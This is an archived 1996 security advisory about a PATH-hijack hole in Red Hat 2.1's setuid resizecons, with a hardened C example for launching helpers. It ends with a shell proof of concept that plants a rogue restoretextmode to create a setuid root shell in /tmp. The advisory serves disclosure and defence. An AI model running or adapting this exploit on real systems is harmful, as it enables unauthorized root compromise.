resizecons Red Hat 2.1 security hole
From: davem+ () andrew cmu edu (David J Meltzer)
Date: Fri, 2 Feb 1996 22:31:23 -0500
There is a security hole in Red Hat 2.1, which installs the program
/usr/bin/resizecons suid root. The resizecons program allows a user
to change the video mode of the console. During this process, it runs
the program restoretextmode without an absolute pathname, assuming the
correct version will be found in the path, while running with root
privileges. It then executes setfont in the same manner. By setting
the path to find a rogue restoretextmode, a user can execute an arbitrary
program as root.
As a more amusing aside, the file /tmp/selection.pid is read and the
pid contained within is sent a SIGWINCH, allowing a user on the system
to force a redraw of the screen to an arbitrary process (that handles
SIGWINCH calls) on the machine.
If /usr/bin/resizecons needs to be run by users other than root at the
console, provisions need to be made in the code to execute the outside
utilities with absolute pathnames, and to check access rights on files
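The paragraph above asks for the helpers to be run by absolute pathname. The following C snippet is added to this archive page and is not taken from the resizecons source; it shows the pattern a setuid program should use for a helper such as restoretextmode: accept only an absolute path, and launch it with execve under a fixed environment so the caller's PATH is never consulted. The function names are this example's own.

```c
/* Hardened helper launch for a setuid program: absolute path only,
 * a fixed environment instead of the caller's PATH, and an explicit
 * wait for the exit status. Example code, not from resizecons. */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Accept only an absolute path that contains no "." or ".." component. */
int helper_path_ok(const char *path)
{
    if (path == NULL || path[0] != '/')
        return 0;
    if (strstr(path, "/../") != NULL || strstr(path, "/./") != NULL)
        return 0;
    size_t n = strlen(path);
    if ((n >= 3 && strcmp(path + n - 3, "/..") == 0) ||
        (n >= 2 && strcmp(path + n - 2, "/.") == 0))
        return 0;
    return 1;
}

/* Run the helper with a fixed environment and return its exit status,
 * or -1 if the path is refused or the helper could not be started.
 * execve() never searches PATH, so a rogue /tmp/restoretextmode placed
 * by the caller is never found; system("restoretextmode") or execvp()
 * would have let the caller's PATH choose the binary run as root. */
int run_helper(const char *path, char *const argv[])
{
    static char *const safe_env[] = { "PATH=/bin:/usr/bin", NULL };
    int status;

    if (!helper_path_ok(path))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, safe_env);
        _exit(127);            /* only reached if execve() failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The same check applies to setfont, which the advisory reports as being launched in the same way.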
Affected Operating Systems: Red Hat 2.1 linux distribution
Requirements: account on system
Temporary Patch: chmod -s /usr/bin/resizecons
Security Compromise: root
Author: Dave M. (davem () cmu edu)
Synopsis: resizecons runs restoretextmode without an absolute pathname while executing as root, allowing a user to substitute the real program with arbitrary commands.
#!/bin/sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
# by Dave M. (davem () cmu edu)
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz. Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
echo ================ Executing resizecons
# (the line that invokes resizecons with the modified PATH is not present in the archived copy of this post)
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi
davem () cmu edu
School of Computer Science
Carnegie Mellon University